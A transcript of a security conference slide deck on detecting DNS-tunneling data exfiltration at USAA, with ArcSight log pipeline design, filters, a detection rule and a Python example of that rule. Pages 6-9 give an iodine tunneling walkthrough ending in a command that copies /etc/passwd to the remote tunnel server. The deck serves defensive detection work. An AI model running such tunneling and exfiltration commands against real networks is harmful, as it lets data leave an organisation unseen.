DNS data exfiltration - Micro Focus Community · DNS data exfiltration Pete Babcock - USAA What is...

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. DNS data exfiltration Pete Babcock - USAA


Page 1

DNS data exfiltration
Pete Babcock - USAA

Page 2

What is DNS Tunneling?

Problem Statement

What happened?

The CTOC discovered that DNS tunneling could be used to exfiltrate data from USAA. Last year, in a penetration test, an External Pen Tester hired by USAA confirmed that fact.

What is DNS Tunneling?

USAA CONFIDENTIAL

Page 4

DNS Tunneling (Greatly Simplified)

[Diagram: "After hacking the Member's USAA Account…" the compromised host issues DNS queries for yourcre.evilbono.com and ditcard.evilbono.com; they pass the internal DNS Server, Security Monitoring and the Firewall and reach the attacker's "DNS Server", where the host portions "yourcre" and "ditcard" are reassembled.]

Page 5

DNS Tunneling

Data Loss Prevention


How hard is it to detect and prevent?

There are no known commercial products that can easily detect this. Very few companies have home-grown solutions. Detection is prone to false positives. There are no known prevention capabilities (that don't break your business…).

Page 6

Tools

DNS Tunneling Testing

What tools can be used to facilitate DNS Tunneling?

There are several, but for this demonstration we used Iodine, which is free.

What are the steps to perform DNS tunneling?

1. Start the Virtual Machine that you plan to run the Iodine Server on.
   a) We used Ubuntu Linux, but there are many options available.

2. Configure external DNS records for the owned domain:
   a) Delegate a subdomain NS record to the host running the Iodine Server.

Page 7

3. Port forward udp53 from external IPs to internal VMWare host running Iodine Server.


Page 8

4. Disable any applications currently bound to UDP 53 (like bind):
   sudo service bind9 stop


5. Start the Iodine Server on the virtual machine:
   sudo iodined -f -c -P secretUSAA1 192.168.99.1 tunnel.hajda.net

Page 9

What are the steps to perform DNS tunneling?

6. Start the iodine client on the internal host:
   sudo iodine -f -P secretUSAA1 tunnel.hajda.net

7. The remote server IP is now 192.168.99.1; copy files through SCP:
   scp /etc/passwd <user>@192.168.99.1:/tmp

You just sent data through a DNS Tunnel!

And your company probably wouldn't detect it…

Page 10

DNS Query Logging and Transmission

USAA Solution

How does one monitor for this type of traffic?

Easy. Just turn on query logging for all DNS traffic leaving your company.

Now quickly turn it back off, because you probably just killed your DNS solution...

Most DNS solutions were not designed to log this volume of events long term.

So, how did USAA successfully log all DNS queries leaving the company then?

An alternative solution utilizing the Load Balancers had to be created and tested. The Load Balancers are strategically placed in front of the DNS solution. Rules on the Load Balancers create load balancer log events for the DNS queries. These events are then streamed via syslog to the ArcSight Connector servers.

Page 11

ArcSight Connector – Volume Issues

USAA Solution

Doesn't this place a lot of load then on the ArcSight Connector?

Yes.

How do you scale the ArcSight Connector to handle the load?

An alternative solution utilizing the Load Balancers had to be created and tested. Multiple ArcSight Connectors are created for DNS – Syslog. These Connectors are placed behind Load Balancers. The load balancer has a Virtual IP Address that it load balances for the connectors. The DNS syslog events are distributed amongst the connectors via the load balanced VIP.

Page 12

ArcSight Connector - Parsing

USAA Solution

How do you parse the Load Balancer log events?

USAA’s Load Balancers can create the events in the Common Event Format (CEF). The default Syslog Daemon connector will parse these out of the box.

However, USAA wanted to extract specific portions of the destinationHostName field into the destinationDnsDomain field. This necessitated a FlexConnector.

This step could be avoided by doing the parsing in the rule using local variables. USAA chose to perform this step at the connector to save CPU on the Manager.

Page 13

ESM – Volume Issues

USAA Solution

So this was the end of the event acquisition issues?

No. The volume of DNS query events quickly began consuming all of the ArcSight ESM ARC_EVENT_DATA free space…

What steps were taken next?

ArcSight ESM Connector filters were then created.

What was filtered?

First, known high volume USAA devices that generate false positives were filtered:
- ArcSight Connectors
- Mail Exchangers
- Proxy Servers

Second, high volume DNS domains that would not be likely to exploit DNS tunneling were filtered.

Page 14

ESM – Rule Filters

USAA Solution

DNS events might be useful for other rules. Should you filter all false positive domains out at the Connector Filter level?

This is a subjective thing. There are some domains that USAA chose to filter out at the Rule Filter level instead of the Connector Filter level.

Page 15

ESM – Rule

USAA Solution

Now that all of the prep work is done, what does the ESM Rule look like?

At the end of the day, the ESM rule is a variation of the basic "N number of events matching X conditions within M amount of time" rule.

We will look at the rule one tab at a time…

Page 16

USAA Solution

Give me DNS query events.

Base and Aggregated events. Not Correlation or Action.

Filter ArcSight Connector DNS queries.

Filter Proxy Server DNS queries.

Filter Mail Exchanger DNS queries.

Filter Specific DNS queries: photobucket.com

Filter Specific DNS queries: images at har.com

Filter sources that are VPN user machines.

Rules Filter: Specific Destination Domains

Page 17

USAA Solution

N = 40 matches, M = 5 minutes

Where the Host portion of the DNS query has 40 (N) different variations

And the Source Address and Destination DNS Domain remain the same.
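The parsing step from the FlexConnector slide (host portion and destinationDnsDomain taken out of destinationHostName) and the rule on this slide (N distinct host portions for one source address and destination DNS domain within M minutes), worked through as an added example; this is not USAA's or ArcSight's code. The CEF lines, the vendor name, the filter lists and the two-label domain split are constructed assumptions.

```python
from collections import defaultdict
# Thresholds from the slide: N = 40 matches within M = 5 minutes.
N_MATCHES = 40
M_WINDOW_SEC = 5 * 60
# Stand-ins for the connector/rule filters on the slides (constructed values).
FILTERED_DOMAINS = {"photobucket.com", "har.com"}
FILTERED_SOURCES = {"10.122.0.250"}

def parse_cef(line):
    """Return the extension fields of one CEF line as a dict (assumes values without spaces)."""
    extension = line.split("|", 7)[7]
    return dict(kv.split("=", 1) for kv in extension.split())

def split_host(fqdn):
    """Split a query name into (host portion, destinationDnsDomain), as the
    FlexConnector step does; assumes a two-label registered domain."""
    labels = fqdn.lower().rstrip(".").split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])

def detect_tunneling(lines, n=N_MATCHES, window=M_WINDOW_SEC):
    """Rule: fire when one (source address, destination DNS domain) pair shows
    n or more distinct host portions within `window` seconds."""
    history = defaultdict(list)   # (src, domain) -> [(timestamp, host portion)]
    fired = set()
    for line in lines:
        ev = parse_cef(line)
        host, domain = split_host(ev["dhost"])
        if ev["src"] in FILTERED_SOURCES or domain in FILTERED_DOMAINS:
            continue                  # dropped by the connector/rule filters
        ts = int(ev["rt"]) / 1000     # CEF rt is epoch milliseconds
        key = (ev["src"], domain)
        history[key].append((ts, host))
        recent = {h for t, h in history[key] if ts - t <= window}
        if len(recent) >= n:
            fired.add(key)
    return sorted(fired)

def cef_line(src, dhost, rt_ms):
    """One constructed load-balancer CEF event (vendor/product names are made up)."""
    return f"CEF:0|ExampleLB|LB|1.0|dnsq|DNS query|3|src={src} dhost={dhost} rt={rt_ms}"

def build_sample_log():
    """Constructed sample: one host with 45 distinct subdomains in 90 s (tunnel-like),
    one host repeating a single name (benign), one host on a filtered domain."""
    base = 1364000000000
    lines = [cef_line("10.122.0.5", f"{i:04x}.tunnel.example.net", base + i * 2000) for i in range(45)]
    lines += [cef_line("10.122.0.7", "www.example.com", base + i * 1000) for i in range(60)]
    lines += [cef_line("10.122.0.9", f"img{i}.photobucket.com", base + i * 2000) for i in range(45)]
    return lines
```

Running detect_tunneling(build_sample_log()) fires only for the 10.122.0.5 / example.net pair: the repeated single hostname never accumulates distinct host portions, and the photobucket.com traffic is dropped by the filter before it can count.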

Page 18

USAA Solution

Suppress exact duplicates for a set amount of time.

Include an external USAA Use Case link in the rule fire Meta Event.

And create a “Must Respond” case for the Analyst to work.

Page 19

ESM – Cases

USAA Solution

What do the ESM Cases look like for these rule fires?

Note: The 10.122.x.x IP Address used for these examples is a Test Lab set up for this demonstration and does not reflect USAA’s Production Environment.

Pages 20-22

Data Loss Prevention

Page 23

DNS Tunneling

Results

Is this solution in Production?

Yes.

Have we detected any true, malicious DNS Tunneling yet?

No, this sophisticated type of exfiltration was not detected. USAA was hoping that we would not see any DNS Tunneling occurring (other than our tests) and was grateful to be proven correct.

Did this satisfy the requirements to monitor for this activity?

Yes, USAA has satisfied the auditors and our own management.

More importantly, we have increased USAA’s security around Data Loss Prevention!

Page 24

Questions?

Q&A

Pages 25-26

Security for the new reality